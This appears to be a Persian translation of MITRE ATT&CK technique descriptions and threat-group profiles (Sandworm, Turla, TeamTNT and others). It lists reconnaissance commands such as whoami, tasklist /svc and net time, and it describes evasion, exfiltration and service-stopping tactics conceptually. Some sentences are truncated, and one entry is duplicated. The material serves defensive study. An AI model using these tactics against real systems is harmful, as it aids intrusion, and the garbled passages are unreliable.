دشمنان ممکن است به دنبال جزئیات مربوط به پیکربندی و تنظیمات شبکه، مانند آدرس‌های IP و یا MAC، سیستم‌هایی باشند که به آنها دسترسی دارند یا از طریق کشف اطلاعات سیستم‌های راه دور. چندین ابزار مدیریت سیستم عامل وجود دارد که می توان از آنها برای جمع آوری این اطلاعات استفاده کرد. به عنوان مثال می توان به Arp، ipconfig/ifconfig، nbtstat و route اشاره کرد. دشمنان ممکن است از اطلاعات System Network Configuration Discovery در طول کشف خودکار برای شکل دادن به رفتارهای بعدی، از جمله تعیین دسترسی معین در شبکه هدف و اقدامات بعدی استفاده کنند.

کشف اتصالات شبکه سیستم

System Network Connections Discovery

دشمنان ممکن است سعی کنند با جستجوی اطلاعات در شبکه، فهرستی از اتصالات شبکه به یا از سیستم در معرض خطری که در حال حاضر به آن دسترسی دارند یا از سیستم های راه دور دریافت کنند.حریفی که به سیستمی دسترسی پیدا می‌کند که بخشی از یک محیط مبتنی بر ابر است، ممکن است ابرهای خصوصی مجازی یا شبکه‌های مجازی را ترسیم کند تا مشخص کند چه سیستم‌ها و سرویس‌هایی متصل هستند. اقدامات انجام شده احتمالاً همان نوع تکنیک های کشف بسته به سیستم عامل هستند، اما اطلاعات حاصل ممکن است شامل جزئیاتی در مورد محیط ابری شبکه شده مرتبط با اهداف دشمن باشد. ارائه‌دهندگان ابر ممکن است راه‌های متفاوتی برای عملکرد شبکه‌های مجازی‌شان داشته باشند. ابزارها و دستوراتی که این اطلاعات را به دست می آورند.

کشف مالک/کاربر سیستم

System Owner/User Discovery

دشمنان ممکن است سعی کنند کاربر اصلی را که در حال حاضر وارد سیستم شده است، مجموعه ای از کاربرانی که معمولاً از یک سیستم استفاده می کنند، یا اینکه آیا کاربر به طور فعال از سیستم استفاده می کند، شناسایی کنند. آنها ممکن است این کار را انجام دهند، برای مثال، با بازیابی نام کاربری حساب یا با استفاده از OS Credential Dumping . اطلاعات ممکن است به روش‌های مختلف با استفاده از سایر تکنیک‌های Discovery جمع‌آوری شود، زیرا جزئیات کاربر و نام کاربری در سراسر سیستم رایج است و شامل مالکیت فرآیند در حال اجرا، مالکیت فایل/دایرکتوری، اطلاعات جلسه و گزارش‌های سیستم می‌شود. دشمنان ممکن است از اطلاعات مالک سیستم/کشف کاربر در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده می کند و/یا اقدامات خاصی را انجام می دهد. ابزارها و دستورات مختلف ممکن است این اطلاعات را به دست آورند، از جمله whoami در macOS و Linux، کاربر وارد شده در حال حاضر با w و who قابل شناسایی است.

کشف خدمات سیستم

System Service Discovery

ممکن است دشمنان سعی کنند اطلاعاتی در مورد خدمات ثبت شده به دست آورند. دستوراتی که ممکن است اطلاعاتی در مورد خدمات با استفاده از ابزارهای سیستم عامل به دست آورند عبارتند از "sc," "tasklist /svc" با استفاده از Tasklist، و ""net start با استفاده از Net، اما دشمنان ممکن است از ابزارهای دیگری نیز استفاده کنند. دشمنان ممکن است از اطلاعات System Service Discovery در حین کشف خودکار برای شکل دادن به رفتارهای بعدی استفاده کنند، از جمله اینکه آیا دشمن به طور کامل هدف را آلوده کرده و/یا اقدامات خاصی را انجام می دهد یا خیر.

کشف زمان سیستم

System Time Discovery

یک حریف ممکن است زمان و/یا منطقه زمانی سیستم را از یک سیستم محلی یا راه دور جمع آوری کند. زمان سیستم توسط سرویس زمان ویندوز در یک دامنه تنظیم و ذخیره می شود تا همگام سازی زمانی بین سیستم ها و خدمات در یک شبکه سازمانی حفظ شود. اطلاعات زمان سیستم ممکن است به روش‌های مختلفی جمع‌آوری شود، مانند Net در ویندوز با انجام net time \hostname برای جمع‌آوری زمان سیستم در یک سیستم راه دور. منطقه زمانی قربانی نیز ممکن است از زمان فعلی سیستم استنتاج شود یا با استفاده از w32tm /tz جمع آوری شود. این اطلاعات می‌تواند برای اجرای تکنیک‌های دیگر، مانند اجرای یک فایل با یک کار/کار زمان‌بندی شده، یا برای کشف اطلاعات محل بر اساس منطقه زمانی برای کمک به هدف‌گیری قربانی (یعنی کشف موقعیت مکانی سیستم) مفید باشد. دشمنان همچنین ممکن است از دانش زمان سیستم به عنوان بخشی از بمب ساعتی استفاده کنند یا اجرا را تا تاریخ/ زمان مشخصی به تأخیر بیندازند.

عکسی که از صفحه ی اسکرین گرفته میشود

Screen Capture

دشمنان ممکن است سعی کنند از صفحه دسکتاپ عکس بگیرند تا اطلاعات را در طول یک عملیات جمع آوری کنند. عملکرد تصویربرداری از صفحه ممکن است به عنوان یکی از ویژگی های ابزار دسترسی از راه دور مورد استفاده در عملیات پس از سازش گنجانده شود. گرفتن اسکرین شات نیز معمولاً از طریق برنامه های کاربردی بومی یا تماس های API، مانند CopyFromScreen، xwd، یا screencapture امکان پذیر است.

انتقال برنامه ریزی شده

Scheduled Transfer

دشمنان ممکن است استخراج داده ها را برنامه ریزی کنند تا فقط در ساعات معینی از روز یا در فواصل زمانی معین انجام شود. این می تواند برای ترکیب الگوهای ترافیک با فعالیت یا در دسترس بودن عادی انجام شود. هنگامی که از اکسفیلتراسیون برنامه ریزی شده استفاده می شود، سایر تکنیک های اکسفیلتراسیون احتمالاً برای انتقال اطلاعات به خارج از شبکه نیز کاربرد دارند. مانند or .

اجرای پروکسی باینری امضا شده

Signed Binary Proxy Execution

دشمنان ممکن است با استفاده از پروکسی اجرای محتوای مخرب با باینری های امضا شده، از فرآیند و/یا دفاع مبتنی بر امضا دور بزنند. باینری‌های امضا شده با گواهی‌های دیجیتال قابل اعتماد می‌توانند در سیستم‌های ویندوزی که با تأیید امضای دیجیتال محافظت می‌شوند اجرا شوند. چندین باینری امضا شده مایکروسافت که به طور پیش فرض در نصب ویندوز هستند، می توانند برای اجرای پروکسی فایل های دیگر استفاده شوند.

اجرای پروکسی اسکریپت امضا شده

Signed Script Proxy Execution

دشمنان ممکن است از اسکریپت های امضا شده با گواهی های مطمئن برای اجرای پروکسی فایل های مخرب استفاده کنند. چندین اسکریپت امضا شده مایکروسافت که به طور پیش فرض در نصب ویندوز هستند را می توان برای اجرای پروکسی فایل های دیگر استفاده کرد. این رفتار ممکن است توسط دشمنان برای اجرای فایل‌های مخربی که می‌توانند کنترل برنامه و اعتبارسنجی امضا در سیستم‌ها را دور بزنند مورد سوء استفاده قرار گیرد.

براندازی کنترل های اعتماد

Subvert Trust Controls

دشمنان ممکن است کنترل‌های امنیتی را تضعیف کنند که یا به کاربران در مورد فعالیت غیرقابل اعتماد هشدار می‌دهند یا از اجرای برنامه‌های نامعتبر جلوگیری می‌کنند. سیستم‌های عامل و محصولات امنیتی ممکن است دارای مکانیسم‌هایی برای شناسایی برنامه‌ها یا وب‌سایت‌هایی باشند که دارای سطحی از اعتماد هستند. نمونه‌هایی از چنین ویژگی‌هایی عبارتند از: اجازه اجرای برنامه به دلیل امضای یک گواهی امضای کد معتبر، برنامه‌ای که کاربر را با اخطار می‌خواهد زیرا مجموعه‌ای از ویژگی‌ها از دانلود از اینترنت دارد، یا دریافت نشانه‌ای مبنی بر اینکه شما در شرف اتصال به یک سایت غیرقابل اعتماد هستند. ممکن است دشمنان تلاش کنند تا این مکانیسم های اعتماد را زیر و رو کنند. روشی که دشمنان استفاده می کنند به مکانیسم خاصی بستگی دارد که آنها به دنبال براندازی هستند. دشمنان ممکن است برای حمایت از براندازی این کنترل‌ها، مجوزهای فایل و فهرست را اصلاح یا رجیستری را اصلاح کنند. دشمنان همچنین ممکن است گواهی های امضای کد را ایجاد کنند یا آنها را بدزدند تا اعتماد سیستم های هدف را به دست آورند.

توقف خدمات

Service Stop

دشمنان ممکن است خدمات را در یک سیستم متوقف یا غیرفعال کنند تا آن خدمات را برای کاربران قانونی از دسترس خارج کنند. توقف خدمات یا فرآیندهای حیاتی می‌تواند پاسخ به یک حادثه را مهار یا متوقف کند یا به اهداف کلی دشمن برای ایجاد آسیب به محیط‌زیست کمک کند.دشمنان ممکن است این کار را با غیرفعال کردن خدمات فردی با اهمیت بالا برای یک سازمان انجام دهند، مانند MSExchangeIS، که محتوای Exchange را غیرقابل دسترس می کند.در برخی موارد، دشمنان ممکن است بسیاری یا همه سرویس‌ها را متوقف یا غیرفعال کنند تا سیستم‌ها را غیرقابل استفاده کنند. سرویس‌ها یا فرآیندها ممکن است اجازه تغییر ذخیره‌های داده‌های خود را در حین اجرا ندهند. دشمنان ممکن است خدمات یا فرآیندها را به منظور انجام تخریب داده یا داده‌های رمزگذاری شده برای تأثیر بر روی ذخیره‌سازی داده‌های سرویس‌هایی مانند Exchange و SQL Server متوقف کنند.

خاموش شدن/راه اندازی مجدد سیستم

System Shutdown/Reboot

دشمنان ممکن است سیستم‌ها را خاموش/ راه‌اندازی مجدد کنند تا دسترسی به آن سیستم‌ها را قطع کنند یا به تخریب آن‌ها کمک کنند. سیستم‌های عامل ممکن است حاوی دستوراتی برای شروع خاموش کردن/راه‌اندازی مجدد دستگاه باشند. در برخی موارد، این دستورات ممکن است برای شروع خاموش کردن/راه‌اندازی مجدد یک کامپیوتر راه دور نیز استفاده شوند. خاموش کردن یا راه‌اندازی مجدد سیستم‌ها ممکن است دسترسی به منابع رایانه را برای کاربران قانونی مختل کند. دشمنان ممکن است پس از تحت تأثیر قرار دادن سیستم به روش‌های دیگری مانند Disk Structure Wipe یا Inhibit System Recovery، سعی کنند سیستم را خاموش/راه‌اندازی مجدد کنند تا تأثیرات مورد نظر بر در دسترس بودن سیستم را تسریع بخشند.

تیم کرم شنی یک گروه تهدید مخرب است

Sandworm Team

تیم کرم شنی یک گروه تهدید مخرب است که به واحد نظامی 74455 اداره اطلاعات اصلی ستاد کل روسیه مرکز اصلی فناوری‌های ویژه نسبت داده شده است. این گروه حداقل از سال 2009 فعال بوده است. در اکتبر 2020، ایالات متحده شش افسر GRU واحد 74455 مرتبط با تیم کرم شنی را به دلیل عملیات سایبری زیر متهم کرد: حملات 2015 و 2016 علیه شرکت های برق اوکراین و سازمان های دولتی، حمله جهانی NotPetya در سال 2017، هدف قرار دادن کمپین ریاست جمهوری فرانسه در سال 2017، حمله ناوشکن المپیک 2018 علیه بازی‌های المپیک زمستانی، عملیات 2018 علیه سازمان منع سلاح‌های شیمیایی و حملات علیه کشور گرجستان در سال‌های 2018 و 2019. برخی از اینها با کمک واحد 26165 GRU انجام شد که به آن نیز می‌گویند.

یک گروه تهدید

Scarlet Mimic

Scarlet Mimic یک گروه تهدید است که فعالان حقوق اقلیت ها را هدف قرار داده است. این گروه مستقیماً با یک منبع دولتی مرتبط نبوده است، اما به نظر می رسد انگیزه های این گروه با انگیزه های دولت چین همپوشانی دارد. در حالی که بین آدرس های IP استفاده شده توسط Scarlet Mimic و Putter Panda مقداری همپوشانی وجود دارد، نتیجه گیری نشده است که گروه ها یکسان هستند.

یک کمپین جاسوسی سایبری

Sharpshooter

Operation Sharpshooter نام یک کمپین جاسوسی سایبری است که در اکتبر 2018 کشف شد و شرکت‌های هسته‌ای، دفاعی، انرژی و مالی را هدف قرار داد. اگرچه همپوشانی هایی بین این دشمن و گروه لازاروس مشاهده شده است، پیوندهای قطعی ایجاد نشده است.

گروه مظنون تهدیدکننده هندی

Sidewinder

Sidewinder یک گروه مظنون تهدیدکننده هندی است که حداقل از سال 2012 فعال بوده است. مشاهده شده است که آنها دولت، ارتش و نهادهای تجاری را در سراسر آسیا هدف قرار می دهند که عمدتاً بر پاکستان، چین، نپال و افغانستان تمرکز دارند.

یک عامل تهدید با انگیزه مالی

Silence

Silence یک عامل تهدید با انگیزه مالی است که موسسات مالی را در کشورهای مختلف هدف قرار می دهد. این گروه اولین بار در ژوئن2016 دیده شد. اهداف اصلی آنها در روسیه، اوکراین، بلاروس، آذربایجان، لهستان و قزاقستان قرار دارند. آنها سیستم های بانکی مختلفی از جمله مشتری ایستگاه کاری خودکار بانک مرکزی روسیه، دستگاه های خودپرداز و پردازش کارت را به خطر انداختند.

گروه نفوذ سایبری

Silent Librarian

Silent Librarian گروهی است که حداقل از سال 2013 تحقیقات و داده‌های اختصاصی را در دانشگاه‌ها، سازمان‌های دولتی و شرکت‌های بخش خصوصی در سرتاسر جهان هدف قرار داده است. اعضای کتابدار خاموش به عنوان وابسته به مؤسسه مبنا مستقر در ایران هستند که نفوذهای سایبری را به دستور دولت ایران، به ویژه سپاه پاسداران انقلاب اسلامی انجام داده است.

گروه تهدید نیجریه

SilverTerrier

SilverTerrier یک گروه تهدید نیجریه است که از سال 2014 فعال بوده است. SilverTerrier عمدتاً سازمان‌هایی را در زمینه فناوری پیشرفته، آموزش عالی، و تولید هدف قرار می‌دهد.

گروه تهدید

Sowbug

Sowbug یک گروه تهدید است که حداقل از سال 2015 حملات هدفمندی را علیه سازمان ها در آمریکای جنوبی و آسیای جنوب شرقی، به ویژه نهادهای دولتی انجام داده است.

گروه تهدید

Stealth Falcon

Stealth Falcon یک گروه تهدید است که حداقل از سال 2012 حملات جاسوسی را علیه خبرنگاران، فعالان و مخالفان اماراتی انجام داده است. تایید شده است.

گروه تهدید

Strider

Strider یک گروه تهدید است که حداقل از سال 2011 فعال بوده و قربانیان را در روسیه، چین، سوئد، بلژیک، ایران و رواندا هدف قرار داده است.

گروه تهدید مستقر در چین

Suckfly

Suckfly یک گروه تهدید مستقر در چین است که حداقل از سال 2014 فعال بوده است.

سیگنالینگ ترافیک

Traffic Signaling

دشمنان ممکن است از سیگنال های ترافیکی برای پنهان کردن پورت های باز یا سایر عملکردهای مخرب استفاده شده برای تداوم یا فرمان و کنترل استفاده کنند. سیگنالینگ ترافیک شامل استفاده از یک مقدار یا دنباله جادویی است که باید به سیستم ارسال شود تا یک پاسخ خاص مانند باز کردن یک پورت بسته یا اجرای یک کار مخرب را ایجاد کند. این ممکن است به شکل ارسال یک سری بسته با ویژگی های خاص قبل از باز شدن یک پورت باشد که دشمن می تواند از آنها برای فرمان و کنترل استفاده کند. معمولاً این سری از بسته ها شامل تلاش برای اتصال به یک دنباله از پیش تعریف شده از پورت های بسته به عنوان مثال ( Port Knocking) است، اما می تواند شامل پرچم های غیر معمول، رشته های خاص یا سایر ویژگی های منحصر به فرد باشد. پس از تکمیل توالی، باز کردن یک پورت ممکن است توسط فایروال مبتنی بر میزبان انجام شود، اما می تواند توسط نرم افزار سفارشی نیز پیاده سازی شود. دشمنان همچنین ممکن است با یک پورت از قبل باز شده ارتباط برقرار کنند، اما سرویسی که در آن پورت گوش می‌دهد تنها در صورتی به دستورات پاسخ می‌دهد یا سایر عملکردهای مخرب را در صورت ارسال مقادیر جادویی مناسب فعال می‌کند.

لیست تاکتیک‌ها MITER ATT&CK

Tactics list MITRE ATT&CK

تاکتیک ها چیزهایی هستند که مهاجمان سعی در دستیابی به آن دارند، در حالی که تکنیک های فردی نحوه انجام آن مراحل یا اهداف است. مثلا یکی از تاکتیک ها Lateral Movement است.

رهگیری احراز هویت دو مرحله ای

Two-Factor Authentication Interception

دشمنان ممکن است مکانیسم های احراز هویت دو عاملی مانند کارت های هوشمند را هدف قرار دهند تا به اعتبارنامه هایی دسترسی پیدا کنند که می توانند برای دسترسی به سیستم ها، خدمات و منابع شبکه مورد استفاده قرار گیرند. استفاده از احراز هویت دو یا چند عاملی )2(FA یا (MFA) توصیه می‌شود و سطح امنیت بالاتری نسبت به نام‌های کاربری و رمز عبور به تنهایی فراهم می‌کند، اما سازمان‌ها باید از تکنیک‌هایی آگاه باشند که می‌توانند برای رهگیری و دور زدن این مکانیسم‌های امنیتی استفاده شوند. اگر از یک کارت هوشمند برای احراز هویت دو مرحله‌ای استفاده می‌شود، باید از یک کی لاگر برای دریافت رمز عبور مرتبط با کارت هوشمند در طول استفاده عادی استفاده شود. هم با کارت درج شده و هم با دسترسی به رمز کارت هوشمند، دشمن می تواند با استفاده از سیستم آلوده به یک منبع شبکه متصل شود تا احراز هویت را با توکن سخت افزاری درج شده پروکسی کند. دشمنان همچنین ممکن است از یک کی لاگر برای هدف قرار دادن سایر توکن های سخت افزاری مانند RSA SecurID استفاده کنند. گرفتن ورودی نشانه (شامل کد شناسایی شخصی کاربر) ممکن است دسترسی موقت (یعنی پخش مجدد رمز عبور یک بار مصرف تا زمان تغییر ارزش بعدی) و همچنین به دشمنان را قادر سازد تا به طور قابل اعتماد مقادیر احراز هویت آینده را پیش بینی کنند (با توجه به دسترسی به الگوریتم و هر مقادیر بذر مورد استفاده برای تولید کدهای موقت الحاقی). سایر روش‌های 2 FAممکن است توسط یک دشمن برای احراز هویت رهگیری و استفاده شود. ارسال کدهای یکبار مصرف از طریق ارتباطات خارج از باند (ایمیل، پیامک) معمول است. اگر دستگاه و/یا سرویس ایمن نباشد، ممکن است در برابر رهگیری آسیب پذیر باشد. اگرچه این مکانیسم‌های احراز هویت عمدتاً توسط مجرمان سایبری متمرکز شده‌اند، اما توسط بازیگران پیشرفته هدف قرار گرفته‌اند.

لکه دار کردن محتوای مشترک

Taint Shared Content

دشمنان ممکن است با افزودن محتوا به مکان‌های ذخیره‌سازی مشترک، مانند درایوهای شبکه یا مخازن کد داخلی، محموله‌ها را به سیستم‌های راه دور تحویل دهند. محتوای ذخیره شده در درایوهای شبکه یا سایر مکان های مشترک ممکن است با افزودن برنامه های مخرب، اسکریپت ها یا کد سوء استفاده به فایل های معتبر دیگر آلوده شود. هنگامی که کاربر محتوای آلوده به اشتراک گذاشته شده را باز می کند، بخش مخرب را می توان برای اجرای کدهای دشمن در یک سیستم راه دور اجرا کرد. دشمنان ممکن است از محتوای به اشتراک گذاشته شده آلوده برای حرکت جانبی استفاده کنند. محور اشتراک دایرکتوری یک تغییر در این تکنیک است که از چندین تکنیک دیگر برای انتشار بدافزار در هنگام دسترسی کاربران به دایرکتوری شبکه مشترک استفاده می کند. از اصلاح میانبر فایل‌های LNK دایرکتوری استفاده می‌کند که از Masquerading برای شبیه‌سازی دایرکتوری‌های واقعی استفاده می‌کند که از طریق فایل‌ها و فهرست‌های مخفی پنهان می‌شوند. دایرکتوری های مخرب مبتنی بر LNK دارای یک فرمان جاسازی شده هستند که فایل بدافزار پنهان را در فهرست اجرا می کند و سپس دایرکتوری مورد نظر واقعی را باز می کند تا عمل مورد انتظار کاربر همچنان انجام شود. هنگامی که این تکنیک با دایرکتوری های شبکه استفاده می شود، ممکن است منجر به آلودگی مجدد مکرر و دسترسی گسترده به سیستم ها و به طور بالقوه به حساب های جدید و دارای امتیاز بالاتر شود. دشمنان همچنین ممکن است دایرکتوری های شبکه مشترک را از طریق آلودگی های باینری با الحاق یا اضافه کردن کد آن به باینری سالم در فهرست شبکه مشترک به خطر بیاندازند. بدافزار ممکن است نقطه ورودی اصلی(OEP) باینری سالم را تغییر دهد تا مطمئن شود که قبل از کد قانونی اجرا شده است. هنگامی که توسط یک سیستم راه دور اجرا می شود، عفونت می تواند از طریق فایل تازه آلوده شده گسترش یابد. این آلودگی‌ها ممکن است هر دو فرمت باینری و غیر باینری را هدف قرار دهند که به پسوندهایی از جمله، اما نه محدود به، .EXE, .DLL, .SCR, .BAT, and/or .VBSختم می‌شوند.

انتقال داده به حساب ابری

Transfer Data to Cloud Account

دشمنان ممکن است با انتقال داده‌ها، از جمله پشتیبان‌گیری از محیط‌های ابری، به حساب ابری دیگری که در همان سرویس کنترل می‌کنند، داده‌ها را استخراج کنند تا از انتقال/دانلود فایل‌های معمولی و تشخیص نفوذ مبتنی بر شبکه جلوگیری کنند. مدافعی که از طریق انتقال فایل های معمولی یا از طریق کانال های فرمان و کنترل بر انتقال های بزرگ به خارج از محیط ابر نظارت می کند، ممکن است مراقب انتقال داده ها به حساب دیگری در همان ارائه دهنده ابر نباشد. چنین انتقال‌هایی ممکن است از APIهای ارائه‌دهنده ابر موجود و فضای آدرس داخلی ارائه‌دهنده ابر برای ترکیب شدن با ترافیک عادی یا جلوگیری از انتقال داده‌ها از طریق رابط‌های شبکه خارجی استفاده کند. حوادثی مشاهده شده است که در آن دشمنان از نمونه های ابری نسخه پشتیبان تهیه کرده و آنها را به حساب های جداگانه منتقل کرده اند.

تزریق قالب

Template Injection

دشمنان ممکن است برای پنهان کردن کدهای مخرب یا اجبار به احراز هویت، ارجاعاتی را در الگوهای اسناد Office ایجاد یا تغییر دهند. مشخصات Office Open XML (OOXML) مایکروسافت یک قالب مبتنی بر XML را برای اسناد آفیس تعریف می‌کند تا جایگزین فرمت‌های باینری قدیمی‌تر شود. فایل‌های OOXML بایگانی‌های ZIP در معرض فایل‌های XML مختلف قرار می‌گیرند که به عنوان بخش‌ها نامیده می‌شوند و حاوی ویژگی‌هایی هستند که مجموعاً نحوه ارائه یک سند را تعریف می‌کنند. ویژگی‌های درون بخش‌ها ممکن است به منابع عمومی مشترکی که از طریق آدرس‌های اینترنتی آنلاین دسترسی دارند، ارجاع دهند. برای مثال، ویژگی‌های الگو به فایلی ارجاع می‌دهند که به عنوان یک طرح اولیه سند از پیش قالب‌بندی شده عمل می‌کند، که هنگام بارگیری سند واکشی می‌شود. دشمنان ممکن است از این فناوری سوء استفاده کنند تا ابتدا کدهای مخرب را پنهان کنند تا از طریق اسناد اجرا شوند. ارجاعات الگوی تزریق شده به یک سند ممکن است به هنگام بارگیری سند، بارهای مخرب را واکشی و اجرا کنند. این اسناد را می‌توان از طریق تکنیک‌های دیگری مانند فیشینگ و/یا محتوای اشتراک‌گذاری شده مخدوش کرد و ممکن است از تشخیص استاتیک اجتناب کند، زیرا هیچ نشانگر معمولی (ماکرو VBA، اسکریپت و غیره) تا زمانی که بار مخرب واکشی نشده است وجود ندارد. نمونه هایی در طبیعت دیده شده است که در آن از تزریق الگو برای بارگذاری کدهای مخرب حاوی یک سوء استفاده استفاده شده است. این تکنیک همچنین ممکن است با تزریق یک URL SMB/HTTPS یا سایر درخواست‌های اعتبار) و شروع تلاش برای احراز هویت، احراز هویت اجباری را فعال کند.

سیگنالینگ ترافیک

Traffic Signaling

دشمنان ممکن است از سیگنال های ترافیکی برای پنهان کردن پورت های باز یا سایر عملکردهای مخرب استفاده شده برای تداوم یا فرمان و کنترل استفاده کنند. سیگنالینگ ترافیک شامل استفاده از یک مقدار یا دنباله جادویی است که باید به سیستم ارسال شود تا یک پاسخ خاص مانند باز کردن یک پورت بسته یا اجرای یک کار مخرب را ایجاد کند. این ممکن است به شکل ارسال یک سری بسته با ویژگی های خاص قبل از باز شدن یک پورت باشد که دشمن می تواند از آنها برای فرمان و کنترل استفاده کند. معمولاً این سری از بسته ها شامل تلاش برای اتصال به یک دنباله از پیش تعریف شده از پورت های بسته (به عنوان مثال Port Knocking) است، اما می تواند شامل پرچم های غیر معمول، رشته های خاص یا سایر ویژگی های منحصر به فرد باشد. پس از تکمیل توالی، باز کردن یک پورت ممکن است توسط فایروال مبتنی بر میزبان انجام شود، اما می تواند توسط نرم افزار سفارشی نیز پیاده سازی شود. دشمنان همچنین ممکن است با درگاهی که قبلاً باز شده است ارتباط برقرار کنند، اما سرویسی که در آن پورت گوش می‌دهد تنها در صورتی به دستورات پاسخ می‌دهد یا سایر عملکردهای مخرب را در صورت ارسال مقادیر جادویی مناسب فعال می‌کند. مشاهده بسته های سیگنال برای راه اندازی ارتباط می تواند از طریق روش‌های مختلفی انجام شود. یکی از ابزارها، که در ابتدا توسط Cd00rپیاده‌سازی شد، استفاده از کتابخانه‌های libpcap برای شناسایی بسته‌های مورد نظر است. روش دیگری از سوکت‌های خام استفاده می‌کند که بدافزار را قادر می‌سازد از پورت‌هایی استفاده کند که از قبل برای استفاده توسط برنامه‌های دیگر باز هستند. در دستگاه های شبکه، دشمنان ممکن است از بسته های ساخته شده برای فعال کردن احراز هویت دستگاه شبکه برای خدمات استاندارد ارائه شده توسط دستگاه مانند telnet استفاده کنند. چنین سیگنال دهی همچنین ممکن است برای باز کردن یک پورت سرویس بسته مانند telnet، یا برای فعال کردن اصلاح ماژول ایمپلنت‌های بدافزار در دستگاه، افزودن، حذف یا تغییر قابلیت‌های مخرب استفاده شود. برای فعال کردن این سیگنال‌های ترافیکی در دستگاه‌های تعبیه‌شده، دشمنان باید ابتدا به Patch System Image به دلیل ماهیت یکپارچه معماری دست یابند و از آن استفاده کنند. همچنین ممکن است دشمنان از ویژگی Wake-on-LAN برای روشن کردن سیستم‌های خاموش استفاده کنند. Wake-on-LAN یک ویژگی سخت افزاری است که به سیستم خاموش شده اجازه می دهد تا با ارسال یک بسته جادویی به آن، روشن یا بیدار شود. هنگامی که سیستم روشن می شود، ممکن است به هدفی برای حرکت جانبی تبدیل شود.

اجرای پروکسی ابزارهای توسعه دهنده معتمد

Trusted Developer Utilities Proxy Execution

ممکن است دشمنان از ابزارهای توسعه‌دهنده مورد اعتماد برای اجرای پراکسی بارهای مخرب استفاده کنند. ابزارهای کمکی زیادی برای کارهای مربوط به توسعه نرم افزار استفاده می شود که می توانند برای اجرای کد به اشکال مختلف برای کمک به توسعه، اشکال زدایی و مهندسی معکوس استفاده شوند. این ابزارهای کمکی ممکن است اغلب با گواهینامه های قانونی امضا شوند که به آنها اجازه می دهد تا بر روی یک سیستم و اجرای پروکسی کد مخرب را از طریق یک فرآیند قابل اعتماد که به طور موثر راه حل های کنترل برنامه را دور می زند، اجرا کنند.

گروه تهدید

TeamTNT

TeamTNT یک گروه تهدید است که عمدتاً محیط های ابری و کانتینری را هدف قرار داده است. این گروه حداقل از اکتبر 2019 فعال بوده و عمدتاً تلاش های خود را بر روی استفاده از منابع ابری و کانتینری برای استقرار استخراج کنندگان ارزهای دیجیتال در محیط های قربانی متمرکز کرده است.

TEMP.Veles

TEMP.Veles یک گروه تهدید مستقر در روسیه است که زیرساخت های حیاتی را هدف قرار داده است. مشاهده شده است که این گروه از TRITON، یک چارچوب بدافزار طراحی شده برای دستکاری سیستم های ایمنی صنعتی استفاده می کند.

شرکت White

The White Company

شرکت White احتمالاً یک بازیگر تهدید کننده با حمایت دولتی با قابلیت‌های پیشرفته است. از سال 2017 تا 2018، این گروه یک کمپین جاسوسی به نام عملیات شاهین را رهبری کرد که سازمان‌های دولتی و نظامی در پاکستان را هدف قرار داد.

گروه تهدید غیرمنصوب

Threat Group-1314

Threat Group-1314یک گروه تهدید غیرمنصوب است که از اعتبارنامه‌های در معرض خطر برای ورود به زیرساخت دسترسی از راه دور قربانی استفاده کرده است.

گروه تهدید چینی

Threat Group-3390

Threat Group-3390یک گروه تهدید چینی است که به طور گسترده از مصالحه های استراتژیک وب برای هدف قرار دادن قربانیان استفاده کرده است. این گروه حداقل از سال 2010 فعال بوده و سازمان‌هایی را در بخش‌های هوافضا، دولت، دفاع، فناوری، انرژی و تولید هدف قرار داده است.

گروه جاسوسی

Thrip

Thrip یک گروه جاسوسی است که ارتباطات ماهواره ای، مخابرات و شرکت های پیمانکاری دفاعی را در ایالات متحده و آسیای جنوب شرقی هدف قرار داده است. این گروه از بدافزارهای سفارشی و همچنین تکنیک های «زندگی خارج از زمین» استفاده می کند.

یک گروه تهدید جاسوسی سایبری

Tonto Team

تیم تونتو یک گروه تهدید جاسوسی سایبری مشکوک توسط دولت چین است که حداقل از سال 2009 عمدتاً کره جنوبی، ژاپن، تایوان و ایالات متحده را هدف قرار داده است. تا سال 2020، آنها فعالیت های خود را گسترش دادند تا سایر کشورهای آسیایی و همچنین کشورهای اروپای شرقی را در بر گیرند. تیم تونتو سازمان‌های دولتی، نظامی، انرژی، معدن، مالی، آموزشی، بهداشت و درمان و فناوری را هدف قرار داده است، از جمله از طریق کمپین ضربان قلب (2009-2012) و عملیات بیسکویت تلخ (2017).

یک گروه تهدید مشکوک

Transparent Tribe

Transparent Tribe یک گروه تهدید مشکوک مستقر در پاکستان است که حداقل از سال 2013 فعال بوده است و عمدتاً سازمان های دیپلماتیک، دفاعی و تحقیقاتی را در هند و افغانستان هدف قرار می دهد.

یک گروه تهدید غیروابسته

Tropic Trooper

Tropic Trooper یک گروه تهدید غیروابسته است که کمپین های هدفمند را علیه اهدافی در تایوان، فیلیپین و هنگ کنگ رهبری کرده است. Tropic Trooper روی هدف قرار دادن دولت، مراقبت های بهداشتی، حمل و نقل و صنایع با فناوری پیشرفته تمرکز دارد و از سال 2011 فعال بوده است.

یک گروه تهدید مستقر در روسیه

Turla

Turla یک گروه تهدید مستقر در روسیه است که قربانیان را در بیش از 45 کشور آلوده کرده است که طیف وسیعی از صنایع از جمله دولت، سفارتخانه ها، ارتش، آموزش، تحقیقات و شرکت های دارویی را در بر می گیرد. فعالیت های افزایش یافته در اواسط سال 2015 مشاهده شد. تورلا به‌خاطر انجام کمپین‌های حفره‌ای و نیزه‌فیشینگ و استفاده از ابزارهای داخلی و بدافزارها شهرت دارد. پلتفرم جاسوسی Turla عمدتاً علیه ماشین‌های ویندوز استفاده می‌شود، اما دیده شده است که علیه ماشین‌های macOS و Linux نیز استفاده شده است.

اجرای کاربر

User Execution

حریف ممکن است به اقدامات خاصی توسط کاربر تکیه کند تا بتواند اجرا شود. کاربران ممکن است تحت مهندسی اجتماعی قرار گیرند تا آنها را وادار به اجرای کدهای مخرب، به عنوان مثال، باز کردن یک فایل سند یا پیوند مخرب کنند. این اقدامات کاربر معمولاً به عنوان رفتار متعاقب اشکال فیشینگ مشاهده می شود. در حالی که اجرای کاربر اغلب مدت کوتاهی پس از دسترسی اولیه رخ می دهد، ممکن است در مراحل دیگر نفوذ رخ دهد، مانند زمانی که دشمن یک فایل را در یک فهرست مشترک یا روی دسکتاپ کاربر قرار می دهد به این امید که کاربر روی آن کلیک کند. این فعالیت ممکن است مدت کوتاهی پس از Spearphishing داخلی نیز دیده شود.

اجرای کاربر: پیوند مخرب

User Execution: Malicious Link

